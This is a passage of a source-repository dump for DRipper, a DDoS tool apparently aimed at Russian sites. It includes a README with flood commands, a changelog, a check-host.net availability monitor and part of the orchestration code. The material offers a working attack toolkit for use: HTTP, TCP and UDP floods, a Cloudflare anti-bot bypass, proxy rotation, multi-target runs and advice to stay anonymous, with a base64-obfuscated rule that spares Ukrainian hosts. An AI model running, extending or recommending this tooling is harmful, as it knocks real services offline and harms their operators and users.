139 |   -k PROXY_TYPE, --proxy-type=PROXY_TYPE  Type of proxy to work with. Supported types: socks5, socks4,
140 |                         http. Default: socks5
141 |   -c HEALTH_CHECK, --health-check=HEALTH_CHECK  Controls health check availability. Turn on: 1, turn off: 0.
142 |                         Default: 1
143 |   -o SOCKET_TIMEOUT, --socket-timeout=SOCKET_TIMEOUT  Timeout for socket connection in seconds. Default (seconds): 1
144 |                         without proxy, 2 with proxy
145 |   --dry-run             Print formatted output without full script running.
146 |   --log-size=LOG_SIZE   Set the Events Log history frame length.
147 |   --log-level=EVENT_LEVEL  Log level for events board. Supported levels: info, warn, error,
148 |                         none.
149 |   -d DURATION, --duration=DURATION  Attack duration in seconds. After this duration script will stop
150 |                         its execution.
151 | 
152 | Example: dripper -t 100 -m tcp-flood -s tcp://192.168.0.1:80
153 | ```
154 | 
155 | ---
156 | 
157 | ## How to find out what is new in a given version
158 | 
159 | For those who run the script directly with Python - you always have the full code base together with the change history (CHANGELOG.md). It is a plain text file; you can open it with any text editor and look through the detailed change history. Or just follow the link and browse the change history online - [CHANGELOG.md](https://github.com/alexmon1989/russia_ddos/blob/main/CHANGELOG.md)
160 | 
--------------------------------------------------------------------------------
/ripper/health_check_manager.py:
--------------------------------------------------------------------------------
1 | import random
2 | import re
3 | import json
4 | import threading
5 | import urllib.request
6 | import gzip
7 | import time
8 | import datetime
9 | from collections import defaultdict
10 | from enum import Enum
11 | from urllib.error import HTTPError
12 | 
13 | from ripper.context.events_journal import EventsJournal
14 | from ripper.constants import *
15 | from ripper.headers_provider import HeadersProvider
16 | 
17 | # Prepare static patterns once at start.
18 | STATUS_PATTERN = re.compile(r"get_check_results\(\n* *'([^']+)")
19 | 
20 | # Forward reference used only for type annotations
21 | Target = 'Target'
22 | 
23 | events_journal = EventsJournal()
24 | 
25 | 
26 | def classify_host_status(node_response):
27 |     """Classifies the status of the host based on the regional node information from check-host.net."""
28 |     if node_response is None:
29 |         return HOST_IN_PROGRESS_STATUS
30 |     try:
31 |         if not isinstance(node_response, list) or len(node_response) != 1:
32 |             return HOST_FAILED_STATUS
33 |         value = node_response[0]
34 |         # tcp, udp
35 |         if isinstance(value, dict):
36 |             if 'error' in value:
37 |                 return HOST_FAILED_STATUS
38 |             else:
39 |                 return HOST_SUCCESS_STATUS
40 |         # http
41 |         if isinstance(value, list) and len(value) == 5:
42 |             return HOST_SUCCESS_STATUS if value[0] == 1 else HOST_FAILED_STATUS
43 |         # ping
44 |         if isinstance(value, list) and len(value) == 4:
45 |             success_cnt = sum([1 if ping[0] == 'OK' else 0 for ping in value])
46 |             return HOST_SUCCESS_STATUS if success_cnt > 1 else HOST_FAILED_STATUS
47 |     except Exception:
48 |         pass
49 |     return None
50 | 
51 | 
52 | # TODO Autodetect gzip and move to utils
53 | def fetch_zipped_body(url: str) -> str:
54 |     """Fetches the gzip-compressed response body of the resource as text."""
55 |     headers_provider = HeadersProvider()
56 |     http_headers = dict(headers_provider.headers)
57 |     http_headers['User-Agent'] = random.choice(headers_provider.user_agents)
58 |     compressed_resp = urllib.request.urlopen(
59 |         urllib.request.Request(url, headers=http_headers)).read()
60 |     return gzip.decompress(compressed_resp).decode('utf8')
61 | 
62 | 
63 | def classify_host_status_http(val):
64 |     """Classifies the status of the host based on the regional node information from check-host.net."""
65 |     if val is None:
66 |         return HOST_IN_PROGRESS_STATUS
67 |     try:
68 |         if isinstance(val, list) and len(val) > 0:
69 |             if 'error' in val[0]:
70 |                 return HOST_FAILED_STATUS
71 |             else:
72 |                 return HOST_SUCCESS_STATUS
73 |     except Exception:
74 |         pass
75 |     return None
76 | 
77 | 
78 | def count_host_statuses(distribution) -> dict:
79 |     """Counts in progress / failed / successful statuses based on nodes from check-host.net."""
80 |     host_statuses = defaultdict(int)
81 |     for val in distribution.values():
82 |         status = classify_host_status(val)
83 |         host_statuses[status] += 1
84 |     return host_statuses
85 | 
86 | 
87 | class HealthStatus(Enum):
88 |     alive = 'alive'
89 |     undefined = 'undefined'
90 |     dead = 'dead'
91 |     start_pending = 'start_pending'
92 | 
93 | 
94 | class AvailabilityDistribution:
95 |     failed: int = None
96 |     succeeded: int = None
97 |     total: int = None
98 | 
99 |     def __init__(self, failed: int, succeeded: int, total: int):
100 |         self.failed = failed
101 |         self.succeeded = succeeded
102 |         self.total = total
103 | 
104 |     @property
105 |     def availability_percentage(self):
106 |         return round(100 * self.succeeded / self.total) if self.total else 0  # avoid ZeroDivisionError on empty results
107 | 
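# Example (sketch): with 19 of 21 check-host.net nodes reporting success,
# AvailabilityDistribution(failed=2, succeeded=19, total=21).availability_percentage
# evaluates to 90, which the statistics table renders as
# "Accessible in 19 of 21 zones (90%)".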
108 | 
109 | class HealthCheckManager:
110 |     """Tracks hosts availability state using check-host.net."""
111 |     headers_provider: HeadersProvider = None
112 |     connections_check_time: int
113 |     is_in_progress: bool = False
114 |     last_host_statuses_update: datetime.datetime = None
115 |     host_statuses = {}
116 | 
117 |     is_forbidden: bool = False
118 |     """Flag to avoid periodic checks when check-host.net has blocked our checks."""
119 | 
120 |     target: Target = None
121 |     _lock: threading.Lock
122 | 
123 |     def __init__(self, target: Target) -> None:
124 |         self._lock = threading.Lock()
125 |         self.headers_provider = HeadersProvider()
126 |         self.target = target
127 | 
128 |     @property
129 |     def health_check_method(self) -> str:
130 |         if self.target.attack_method == 'http-flood':
131 |             return 'http'
132 |         elif self.target.attack_method == 'tcp-flood':
133 |             return 'tcp'
134 |         # udp check had false positives, further research is required
135 |         # elif self.target.attack_method == 'udp-flood':
136 |         #     return 'udp'
137 |         return 'ping'
138 | 
139 |     @property
140 |     def request_url(self) -> str:
141 |         host = f'{self.target.host_ip}:{self.target.port}'
142 |         if self.health_check_method == 'http':
143 |             # https connection will not be established
144 |             # the plain http request will be sent to https port
145 |             # in some cases it will lead to false negative
146 |             if self.target.port == 443:
147 |                 host = f'{self.target.host}'
148 |             else:
149 |                 host = f'{self.target.host}:{self.target.port}'
150 |         elif self.health_check_method == 'ping':
151 |             host = self.target.host_ip
152 | 
153 |         path = f'/check-{self.health_check_method}'
154 |         return f'https://check-host.net{path}?host={host}'
155 | 
156 |     @property
157 |     def is_pending(self) -> bool:
158 |         return self.is_in_progress or self.last_host_statuses_update is None or sum(self.host_statuses.values()) < 1
159 | 
160 |     @property
161 |     def availability_distribution(self) -> AvailabilityDistribution:
162 |         failed = self.host_statuses[HOST_FAILED_STATUS] if HOST_FAILED_STATUS in self.host_statuses else 0
163 |         succeeded = self.host_statuses[HOST_SUCCESS_STATUS] if HOST_SUCCESS_STATUS in self.host_statuses else 0
164 |         total = sum(self.host_statuses.values())
165 |         return AvailabilityDistribution(
166 |             failed=failed,
167 |             succeeded=succeeded,
168 |             total=total,
169 |         )
170 | 
171 |     @property
172 |     def status(self) -> HealthStatus:
173 |         if self.is_in_progress and not self.last_host_statuses_update:
174 |             return HealthStatus.start_pending
175 |         avd = self.availability_distribution
176 |         if avd.total < 1:
177 |             return HealthStatus.undefined
178 |         if avd.availability_percentage < MIN_ALIVE_AVAILABILITY_PERCENTAGE:
179 |             return HealthStatus.dead
180 |         return HealthStatus.alive
181 | 
182 |     def update_host_statuses(self) -> dict:
183 |         """Fetches regional availability statuses."""
184 |         with self._lock:
185 |             self.is_in_progress = True
186 |             current_host_statuses = {}
187 |             try:
188 |                 body = fetch_zipped_body(self.request_url)
189 |                 # request_code is a sort of trace id returned by the master node on every request
190 |                 request_code = re.search(STATUS_PATTERN, body)[1]
191 |                 # it takes time to poll all information from the slave nodes
192 |                 time.sleep(5)
193 |                 # do not poll for more than ~30 seconds in total to avoid an endless loop
194 |                 for _ in range(5):
195 |                     time.sleep(5)
196 |                     resp_data = json.loads(fetch_zipped_body(f'https://check-host.net/check_result/{request_code}'))
197 |                     current_host_statuses = count_host_statuses(resp_data)
198 |                     if HOST_IN_PROGRESS_STATUS not in current_host_statuses:
199 |                         break
200 |             except HTTPError as http_err:
201 |                 if http_err.status == 403:
202 |                     self.is_forbidden = True
203 |                 events_journal.exception(http_err)
204 |             except Exception as ex:
205 |                 events_journal.exception(ex)
206 |             self.is_in_progress = False
207 |             self.host_statuses = current_host_statuses
208 |             self.last_host_statuses_update = datetime.datetime.now()
209 |             return current_host_statuses
210 | 
--------------------------------------------------------------------------------
/CHANGELOG.md:
--------------------------------------------------------------------------------
1 | # Change Log
2 | All notable changes to this project will be documented in this file.
3 | 
4 | The format is based on [Keep a Changelog](https://keepachangelog.com)
5 | and this project adheres to [Semantic Versioning](https://semver.org).
6 | 
7 | ## [Unreleased](https://github.com/alexmon1989/russia_ddos/compare/2.6.3...HEAD)
8 | 
9 | 
10 | ## [v2.6.3](https://github.com/alexmon1989/russia_ddos/compare/2.6.2...2.6.3)
11 | 
12 | ### Changed
13 | - Moved initial checks into the attacks to speed up script start
14 | 
15 | ### Fixed
16 | - Fixed error with Request lib import
17 | 
18 | 
19 | ## [v2.6.2](https://github.com/alexmon1989/russia_ddos/compare/2.6.1...2.6.2)
20 | 
21 | ### Fixed
22 | - Fixed error with encoding for external resources (targets list)
23 | 
24 | 
25 | ## [v2.6.1](https://github.com/alexmon1989/russia_ddos/compare/2.6.0...2.6.1)
26 | 
27 | ### Fixed
28 | - Fixed timeouts
29 | - Fixed script start logic
30 | 
31 | ## [v2.6.0](https://github.com/alexmon1989/russia_ddos/compare/2.5.0...2.6.0)
32 | 
33 | ### Added
34 | - Attack duration param (in seconds). After this duration the script will stop its execution.
35 | - User guide and setup guide
36 | - Threads count autoscaling. The `-t` argument (same as `--threads-count`) now supports **auto**. The auto-scaling method is the default.
37 | - Check for the minimal required Python version
38 | - Attack duration controller. The `-d` argument (same as `--duration`) sets the attack duration in seconds. After this duration the script will stop its execution.
39 | - Targets list support. The `--targets-list` argument allows you to use a list with targets. The list with targets can be a path to a file or a hyperlink.
40 | 
41 | ### Changed
42 | - Random bytes optimization (performance improvement)
43 | - Changed CLI arguments for package size management
44 | - Improved speed for the new version check
45 | - Improved text messages for better user experience
46 | 
47 | ### Fixed
48 | - Fixed command parameter generator to help users with incorrect command line parameters or errors with parameters
49 | - Test UDP connection for UDP scheme if TCP did not work
50 | 
51 | 
52 | ## [v2.5.0](https://github.com/alexmon1989/russia_ddos/compare/2.4.0...2.5.0)
53 | 
54 | ### Added
55 | - Check DRipper updates from GitHub tags and show a notification to the user about it.
56 | - Added check for anti-DDoS page protection for the check-host.net service.
57 | - Script command parameter generator to help users with incorrect command line parameters or errors with parameters
58 | 
59 | ### Changed
60 | - Changed multiple target argument passing. Targets should be passed separately with the `-s` flag.
61 | - Moved target specific validation from statistic and context to the Target class
62 | - Targets manager can allocate attacks after a target is removed and encapsulates the logic related to the targets collection management.
63 | 
64 | 
65 | ## [v2.4.0](https://github.com/alexmon1989/russia_ddos/compare/2.3.1...2.4.0)
66 | 
67 | ### Added
68 | - Added support for multiple targets. Multiple targets should be passed as a string with ',' as the delimiter
69 | - Threads are distributed uniformly between targets.
70 | - Irresponsive targets and their threads die in runtime.
71 | - Added support for the log-level argument.
72 | 
73 | ### Changed
74 | - Target-related stats are represented on pages. Pages are rotated automatically in 5 second intervals.
75 | - Refactored stats representation. Isolated target-related details builder.
76 | - Isolated time interval manager.
77 | - Improved error messages and descriptions shown when validating input arguments.
78 | 
79 | ### Fixed
80 | - Fixed CloudFlare detection logic.
81 | 
82 | 
83 | ## [v2.3.1](https://github.com/alexmon1989/russia_ddos/compare/2.3.0...2.3.1)
84 | 
85 | ### Fixed
86 | - Fixed setup script and Docker builds
87 | 
88 | 
89 | ## [v2.3.0](https://github.com/alexmon1989/russia_ddos/compare/2.2.0...2.3.0)
90 | 
91 | ### Added
92 | - `dry run` mode for fast testing purposes
93 | - CloudFlare bypass mode for HTTP flood method
94 | - Events log that helps to understand attack process details in depth
95 | - `--log-size` parameter to configure Events log history frame length
96 | 
97 | ### Fixed
98 | - Fixed error with keyboard interrupting and threads shutdown process
99 | - Reduced IP address re-checks to avoid redundant API calls
100 | - Attack checks methods, improved speed
101 | - Rendering the table with statistics no longer re-renders the table caption with the logo
102 | 
103 | ### Changed
104 | - Isolated target. The target contains a full server description, statistics, and health check. It is an intermediate step towards multiple targets.
105 | - Formalized attack_method, added names and labels for attacks.
106 | - Isolated assets.
107 | - Split context on components.
108 | - Changed health check to be target-dependent.
109 | - Reduced awareness about the entire context structure.
110 | - Unified tests format. Classes should represent "Describe" blocks, and test methods should start with "it."
111 | - Changed Exception handling and logging process.
112 | - Replaced Error class with Events
113 | 
114 | 
115 | ## [v2.2.0](https://github.com/alexmon1989/russia_ddos/compare/2.1.0...2.2.0)
116 | 
117 | ### Added
118 | - Command line option `--version` to get the current version of the script
119 | - Added support for HTTP and SOCKS4 proxy.
120 | - Added the possibility to read proxies from an HTTP/HTTPS location. It helps to organize multiple peers.
121 | 
122 | ### Changed
123 | - UDP/TCP/HTTP attack methods internals
124 | - HTTP Status code check method now supports periodical check
125 | - Improved performance for HTTP flood
126 | 
127 | 
128 | ## [v2.1.0](https://github.com/alexmon1989/russia_ddos/compare/2.0.4...2.1.0)
129 | 
130 | 
131 | ### Added
132 | - Added support for SOCKS5 proxies. (HTTP/TCP only)
133 | - Added possibility to dismiss health check. It is helpful during development.
134 | - Added the possibility to attach random extra_data to HTTP attacks (turned off by default).
135 | - Added build tools to create `dripper` executable for Windows/Linux/macOS 136 | 137 | ### Fixed 138 | - Fixed proxy list params read 139 | 140 | ### Changed 141 | - Reworked Error log for Statistic 142 | 143 | 144 | ## [v2.0.4](https://github.com/alexmon1989/russia_ddos/compare/2.0.3...2.0.4) 145 | 146 | ### Changed 147 | - Moved options parser to separate module 148 | - Simplified health check logic 149 | - Improved script start time 150 | 151 | 152 | ## [v2.0.3](https://github.com/alexmon1989/russia_ddos/compare/2.0.3...2.0.3) 153 | 154 | ### Fixed 155 | - Fixed vertical scrolling issue 156 | - Fixed live refresh for Statistic 157 | 158 | 159 | ## [v2.0.2](https://github.com/alexmon1989/russia_ddos/compare/2.0.1...2.0.2) 160 | 161 | ### Fixed 162 | - Fixed bug with missed property for Packets statistic [#37](https://github.com/alexmon1989/russia_ddos/issues/37) 163 | 164 | 165 | ## [v2.0.1](https://github.com/alexmon1989/russia_ddos/compare/2.0.0...2.0.1) 166 | 167 | ### Fixed 168 | - Fixed bug with missed property for Packets statistic [#37](https://github.com/alexmon1989/russia_ddos/issues/37) 169 | 170 | 171 | ## [v2.0.0](https://github.com/alexmon1989/russia_ddos/compare/1.3.9...2.0.0) 172 | 173 | ### Changed 174 | - Simplified logic 175 | - Reworked statistic 176 | - Other code improvements 177 | 178 | ### Fixed 179 | - Fixed several bugs 180 | 181 | 182 | ## [v1.3.9](https://github.com/alexmon1989/russia_ddos/compare/1.3.8...1.3.9) 183 | 184 | ### Added 185 | - Added country detection and displaying in Statistic 186 | 187 | ### Changed 188 | - Optimized UDP attack 189 | - Minor improvements 190 | 191 | 192 | ## [v1.3.8](https://github.com/alexmon1989/russia_ddos/compare/1.3.7...1.3.8) 193 | 194 | ### Added 195 | - Added CloudFlare detection 196 | - Added support for cross-platform colored CLI output 197 | 198 | ### Changed 199 | - Improved performance 200 | - Improved UI 201 | 202 | ### Fixed 203 | - Fixed several bugs 204 | 205 | 206 | ## [v1.3.7](https://github.com/alexmon1989/russia_ddos/compare/1.3.6...1.3.7) 207 | 208 | ### Fixed 209 | - Fixed several bugs 210 | 211 | 212 | ## [v1.3.6](https://github.com/alexmon1989/russia_ddos/compare/1.3.5...1.3.6) 213 | 214 | ### Added 215 | - Added version displaying in header 216 | - Added Python 3.8 support 217 | 218 | ### Fixed 219 | - Fixed several bugs 220 | 221 | 222 | ## [v1.3.5](https://github.com/alexmon1989/russia_ddos/compare/1.3.4...1.3.5) 223 | 224 | ### Added 225 | - Added TCP flood 226 | 227 | ### Fixed 228 | - Fixed check connection 229 | 230 | 231 | ## [v1.3.4](https://github.com/alexmon1989/russia_ddos/compare/1.3.1...1.3.4) 232 | 233 | ### Added 234 | - Added ARM support for Docker builds 235 | 236 | 237 | ## [v1.3.1](https://github.com/alexmon1989/russia_ddos/compare/1.3.0...1.3.1) 238 | 239 | ### Added 240 | - Added validation 241 | 242 | 243 | ## [v1.3.0](https://github.com/alexmon1989/russia_ddos/compare/1.1.0...1.3.0) 244 | 245 | ### Changed 246 | - Improved logging 247 | 248 | ### Fixed 249 | - Fixed IndexOutOfBound Exception 250 | 251 | 252 | ## [v1.1.0](https://github.com/alexmon1989/russia_ddos/compare/1.1.0...1.1.0) 253 | 254 | ### Changed 255 | - Changed UI 256 | - Improved speed 257 | 258 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DRipper 2 | 3 | [![Build status][actions build badge]][actions build link] 4 | [![Docker Pulls][docker pulls badge]][docker pulls link] 5 
| [![Docker Image Version (latest semver)][dockerhub badge]][dockerhub link]
6 | [![License: MIT][license badge]][license link]
7 | 
8 | DESCRIPTION
9 | -----------
10 | 
11 | This is a reworked version of [DRipper](https://gist.github.com/scamp/33807688d0ebdcfbd4c29a4b992a8b54).
12 | The script supports HTTP/TCP/UDP flood attacks. We recommend using this script for your own test purposes in a local (on-premise) environment, to improve the resilience of your own web services against DDoS attacks.
13 | 
14 | ## Prerequisites
15 | 
16 | - Python 3.9 or higher
17 | - Docker (optional), if you'd like to run the script with Docker
18 | 
19 | ## Features
20 | 
21 | ### Attacks
22 | 
23 | - HTTP Flood - OSI Layer 7 volumetric attack
24 | - HTTP Bypass - OSI Layer 7 volumetric attack that bypasses Cloudflare's anti-bot page (also known as "I'm Under Attack Mode", or IUAM)
25 | - TCP Flood - OSI Layer 4 volumetric attack
26 | - UDP Flood - OSI Layer 4 volumetric attack
27 | 
28 | ### Other features
29 | 
30 | - Multiple targets support - the script can attack several targets at the same time
31 | - Detailed statistics with a deep attack log for better analysis during the attack
32 | - Displays the average request rate and throughput
33 | - Periodic checks of your public IP address to ensure your privacy and VPN connection survivability
34 | - Automatic and periodic checks of the attacked host's availability
35 | - Distribution of the response codes from the attacked host, which helps you to understand the effectiveness of the attack
36 | - Detection of redirects and rate limits with alerts in the event log
37 | 
38 | ## How it looks
39 | 
40 | ```bash
41 | ───────────────────────────────────────── Starting DRipper ─────────────────────────────────────────
42 | [23:17:39] (1/3) tcp://www.site1.ru:80/ (192.168.0.101:80)     Trying to connect...   services.py:135
43 |            (1/3) tcp://www.site1.ru:80/ (192.168.0.101:80)     Connected              services.py:138
44 |            (1/3) https://www.site2.ru:443/ (192.168.0.102:443) Trying to connect...   services.py:135
45 |            (1/3) https://www.site2.ru:443/ (192.168.0.102:443) Connected              services.py:138
46 | ────────────────────────────────────────────────────────────────────────────────────────────────────
47 | 
48 | 
49 |          ██████╗ ██████═╗██╗██████╗ ██████╗ ███████╗██████═╗
50 |          ██╔══██╗██╔══██║██║██╔══██╗██╔══██╗██╔════╝██╔══██║
51 |          ██║  ██║██████╔╝██║██████╔╝██████╔╝█████╗  ██████╔╝
52 |          ██║  ██║██╔══██╗██║██╔═══╝ ██╔═══╝ ██╔══╝  ██╔══██╗
53 |          ██████╔╝██║  ██║██║██║     ██║     ███████╗██║  ██║
54 |          ╚═════╝ ╚═╝  ╚═╝╚═╝╚═╝     ╚═╝     ╚══════╝╚═╝  ╚═╝
55 |                                                       v2.5.0
56 | 
57 |     It is the end user's responsibility to obey all applicable laws.
58 |     It is just like a server testing script and Your IP is visible.
59 |                    Please, make sure you are ANONYMOUS!
60 | 61 | https://github.com/alexmon1989/russia_ddos 62 | 63 | 64 | ────────────────────────────────────────────────────────────────────────────────────────────────── 65 | Description Status 66 | ────────────────────────────────────────────────────────────────────────────────────────────────── 67 | Start Time, Duration 2022-04-08 23:17:29 (0:00:14) 68 | Your Country, Public IP DK 45.***.***.*** 69 | Total Threads 200 70 | vCPU Count 8 71 | Socket Timeout (seconds) 1 72 | ────────────────────────────────────────────────────────────────────────────────────────────────── 73 | Target (tcp://www.site1.ru:80/) 1/2 (next in 1) 74 | ────────────────────────────────────────────────────────────────────────────────────────────────── 75 | Country, Host IP RU 192.168.0.101:80 (target-0) 76 | Attack Method TCP-FLOOD 77 | Random Packet Length (bytes) From 1 to 1024 78 | Threads 100 79 | CloudFlare Protection Not protected 80 | Availability (check-host.net) ...detecting (TCP method) 81 | Sent Bytes @ AVG speed 1.73 MB @ 119.76 kB/s 82 | Sent Packets @ AVG speed 3,531 @ 238 packets/s 83 | Connections success: 100, failed: 0, success rate: 100 % 84 | ────────────────────────────────────────────────────────────────────────────────────────────────── 85 | 86 | Events Log 87 | ────────────────────────────────────────────────────────────────────────────────────────────────── 88 | [23:17:40] info target-0 thread-14 Creating new TCP connection... 89 | [23:17:40] info target-0 thread-114 Creating new TCP connection... 90 | [23:17:40] info target-0 thread-16 Creating new TCP connection... 91 | [23:17:40] info target-0 thread-20 Creating new TCP connection... 92 | [23:17:40] info target-0 thread-22 Creating new TCP connection... 93 | 94 | Press CTRL+C to interrupt process. 95 | 96 | #StandWithUkraine 97 | ``` 98 | 99 | ## Usage 100 | 101 | DRipper can run on Windows/Linux/macOS from command line. 102 | We recommend to use `PowerShell` for Windows users to run the script, Linux/macOS users can use any shell. 103 | 104 | Run `dripper --help` to see detailed params description. 105 | 106 | ```bash 107 | Usage: DRipper.py [options] arg 108 | 109 | Options: 110 | --version show program's version number and exit 111 | -h, --help show this help message and exit 112 | -s TARGETS, --targets=TARGETS Attack target in {scheme}://{hostname}[:{port}][{path}] format. 113 | Multiple targets allowed. 114 | -m ATTACK_METHOD, --method=ATTACK_METHOD Attack method: udp-flood, tcp-flood, http-flood, http-bypass 115 | -e HTTP_METHOD, --http-method=HTTP_METHOD HTTP method. Default: GET 116 | -t THREADS_COUNT, --threads=THREADS_COUNT Total threads count. Default: 100 117 | --min-random-packet-len=MIN_RANDOM_PACKET_LEN 118 | Min random packets length. Default: 1 for udp/tcp 119 | -l MAX_RANDOM_PACKET_LEN, --max-random_packet-len=MAX_RANDOM_PACKET_LEN 120 | Max random packets length. Default: 1024 for udp/tcp 121 | -y PROXY_LIST, --proxy-list=PROXY_LIST File (fs or http/https) with proxies in 122 | ip:port:username:password line format. Proxies will be ignored 123 | in udp attack! 124 | -k PROXY_TYPE, --proxy-type=PROXY_TYPE Type of proxy to work with. Supported types: socks5, socks4, 125 | http. Default: socks5 126 | -c HEALTH_CHECK, --health-check=HEALTH_CHECK Controls health check availability. Turn on: 1, turn off: 0. 127 | Default: 1 128 | -o SOCKET_TIMEOUT, --socket-timeout=SOCKET_TIMEOUT Timeout for socket connection is seconds. 
Default (seconds): 1 129 | without proxy, 2 with proxy 130 | --dry-run Print formatted output without full script running. 131 | --log-size=LOG_SIZE Set the Events Log history frame length. 132 | --log-level=EVENT_LEVEL Log level for events board. Supported levels: info, warn, error, 133 | none. 134 | -d DURATION_SECONDS, --duration=DURATION_SECONDS Attack duration in seconds. After this duration script will 135 | stop its execution. 136 | 137 | Example: dripper -t 100 -m tcp-flood -s tcp://192.168.0.1:80 138 | ``` 139 | 140 | ## How to Run 141 | 142 | #### Using Docker 143 | 144 | ```bash 145 | # HTTP flood 146 | docker run -it --rm alexmon1989/dripper:latest -t 100 -m http-flood -s http://127.0.0.1:80 147 | # or 148 | docker run -it --rm alexmon1989/dripper:latest -t 100 -s http://127.0.0.1:80 149 | # or even 150 | docker run -it --rm alexmon1989/dripper:latest -s http://127.0.0.1 151 | 152 | # TCP flood 153 | docker run -it --rm alexmon1989/dripper:latest -t 100 -l 2048 -s tcp://127.0.0.1:80 154 | 155 | # UDP flood 156 | docker run -it --rm alexmon1989/dripper:latest -t 100 -l 2048 -s udp://127.0.0.1:80 157 | ``` 158 | 159 | #### Directly with Python. 160 | 161 | Ensure you have Python 3.9 or better installed. Then clone this repo and run DRipper.py with params you need 162 | 163 | ```bash 164 | git clone https://github.com/alexmon1989/russia_ddos.git 165 | cd russia_ddos 166 | 167 | # Install dependencies 168 | python3 -m pip install --upgrade pip git+https://github.com/alexmon1989/russia_ddos.git 169 | # Run script 170 | dripper -t 100 -s udp://127.0.0.1:80 171 | 172 | 173 | # ===== Alternative variant ===== 174 | 175 | # Install python dependencies: 176 | pip install -r requirements.txt 177 | # Run script 178 | python3 DRipper.py -t 100 -s udp://127.0.0.1:80 179 | ``` 180 | 181 | #### Kubernetes 182 | 183 | You can deploy and run DRipper in Kubernetes cluster using [kube-dripper][kube-dripper-link] terraform configuration. 184 | For details - see the [README][kube-dripper-readme] from **kube-dripper** project. 185 | 186 | ## How to run unit tests 187 | 188 | #### Prepare 189 | ```bash 190 | pip install -r requirements.test.txt 191 | ``` 192 | 193 | #### Run 194 | ```bash 195 | pytest 196 | 197 | # with code coverage report: 198 | pytest --cov-report=html:./htmlcov 199 | ``` 200 | 201 | # License 202 | 203 | This project is distributed under the MIT License, see [LICENSE](./LICENSE) for more information. 
204 | 205 | 206 | [actions build badge]: https://github.com/alexmon1989/russia_ddos/actions/workflows/build.yml/badge.svg 207 | [actions build link]: https://github.com/alexmon1989/russia_ddos/actions/workflows/build.yml 208 | 209 | [docker pulls link]: https://hub.docker.com/r/alexmon1989/dripper 210 | [docker pulls badge]: https://img.shields.io/docker/pulls/alexmon1989/dripper 211 | [dockerhub link]: https://hub.docker.com/r/alexmon1989/dripper/tags 212 | [dockerhub badge]: https://img.shields.io/docker/v/alexmon1989/dripper?label=DockerHub 213 | 214 | [kube-dripper-link]: https://github.com/denismakogon/kube-dripper 215 | [kube-dripper-readme]: https://github.com/denismakogon/kube-dripper/blob/main/README.md 216 | 217 | [license badge]: https://img.shields.io/badge/License-MIT-yellow.svg 218 | [license link]: ./LICENSE 219 | -------------------------------------------------------------------------------- /ripper/services.py: -------------------------------------------------------------------------------- 1 | # XXX Services look unstructured 2 | import signal 3 | import sys 4 | import threading 5 | import time 6 | from base64 import b64decode 7 | from rich import box 8 | from rich.console import Console 9 | from rich.panel import Panel 10 | from rich.live import Live 11 | 12 | from _version import __version__ 13 | from ripper.github_updates_checker import GithubUpdatesChecker 14 | from ripper import common, arg_parser 15 | from ripper.actions.attack import attack_method_labels 16 | from ripper.constants import * 17 | from ripper.context.context import Context, Target 18 | from ripper.common import get_current_ip, generate_random_bytes 19 | from ripper.context.events_journal import EventsJournal 20 | from ripper.health_check_manager import HealthStatus 21 | from ripper.proxy import Proxy 22 | 23 | exit_event = threading.Event() 24 | events_journal = EventsJournal() 25 | 26 | 27 | ############################################### 28 | # Target-only 29 | ############################################### 30 | def update_host_statuses(target: Target): 31 | """Updates host statuses based on check-host.net nodes.""" 32 | if target.health_check_manager.is_forbidden: # Do not check health status when service blocking your IP 33 | return 34 | 35 | if target.health_check_manager.is_in_progress or not target.time_interval_manager.check_timer_elapsed( 36 | bucket=f'update_host_statuses_{target.uri}', sec=MIN_UPDATE_HOST_STATUSES_TIMEOUT): 37 | return 38 | 39 | if target.host_ip: 40 | if target.health_check_manager.update_host_statuses() == {}: 41 | events_journal.error(f'Host statuses update failed with check-host.net', target=target) 42 | else: 43 | events_journal.info(f'Host statuses updated with check-host.net', target=target) 44 | 45 | 46 | ############################################### 47 | # Context-only 48 | ############################################### 49 | # TODO use context as an argument name 50 | def update_current_ip(_ctx: Context, check_period_sec: int = 0) -> None: 51 | """Updates current IPv4 address.""" 52 | if _ctx.time_interval_manager.check_timer_elapsed(check_period_sec, 'update_current_ip'): 53 | events_journal.info(f'Checking my public IP address (period: {check_period_sec} sec)') 54 | _ctx.myIpInfo.current_ip = get_current_ip() 55 | if _ctx.myIpInfo.start_ip is None: 56 | _ctx.myIpInfo.start_ip = _ctx.myIpInfo.current_ip 57 | 58 | 59 | def go_home(_ctx: Context) -> None: 60 | """Modifies host to match the rules.""" 61 | home_code = b64decode('dWE=').decode('utf-8') 62 | for 
target in _ctx.targets_manager.targets: 63 | if target.host.endswith('.' + home_code.lower()) or common.get_country_by_ipv4(target.host_ip) in home_code.upper(): 64 | target.host_ip = target.host = 'localhost' 65 | target.host += '*' 66 | 67 | 68 | def refresh_context_details(_ctx: Context) -> None: 69 | """Check threads, IPs, VPN status, etc.""" 70 | 71 | with threading.Lock(): 72 | threading.Thread( 73 | name='update-ip', target=update_current_ip, 74 | args=[_ctx, UPDATE_CURRENT_IP_CHECK_PERIOD_SEC], daemon=True).start() 75 | 76 | if _ctx.is_health_check: 77 | for target in _ctx.targets_manager.targets: 78 | threading.Thread( 79 | name='check-host', target=update_host_statuses, 80 | args=[target], daemon=True).start() 81 | 82 | if _ctx.myIpInfo.country == GEOIP_NOT_DEFINED: 83 | threading.Thread( 84 | name='upd-country', target=common.get_country_by_ipv4, 85 | args=[_ctx.myIpInfo.current_ip], daemon=True).start() 86 | 87 | for target in _ctx.targets_manager.targets: 88 | if target.country == GEOIP_NOT_DEFINED: 89 | threading.Thread( 90 | name='upd-country', target=common.get_country_by_ipv4, 91 | args=[target.host_ip], daemon=True).start() 92 | 93 | # Check for my IPv4 wasn't changed (if no proxylist only) 94 | if _ctx.proxy_manager.proxy_list_initial_len == 0 and _ctx.myIpInfo.is_ip_changed(): 95 | events_journal.error(YOUR_IP_WAS_CHANGED_ERR_MSG) 96 | 97 | for target in _ctx.targets_manager.targets[:]: 98 | if not target.validate_connection(): 99 | events_journal.error(NO_CONNECTIONS_ERR_MSG, target=target) 100 | _ctx.targets_manager.delete_target(target) 101 | if target.health_check_manager.status == HealthStatus.dead: 102 | events_journal.error(TARGET_DEAD_ERR_MSG, target=target) 103 | _ctx.targets_manager.delete_target(target) 104 | if _ctx.targets_manager.targets_count() < 1: 105 | _ctx.logger.log(NO_MORE_TARGETS_LEFT_ERR_MSG) 106 | exit(1) 107 | 108 | if _ctx.proxy_manager.proxy_list_initial_len > 0 and len(_ctx.proxy_manager.proxy_list) == 0: 109 | 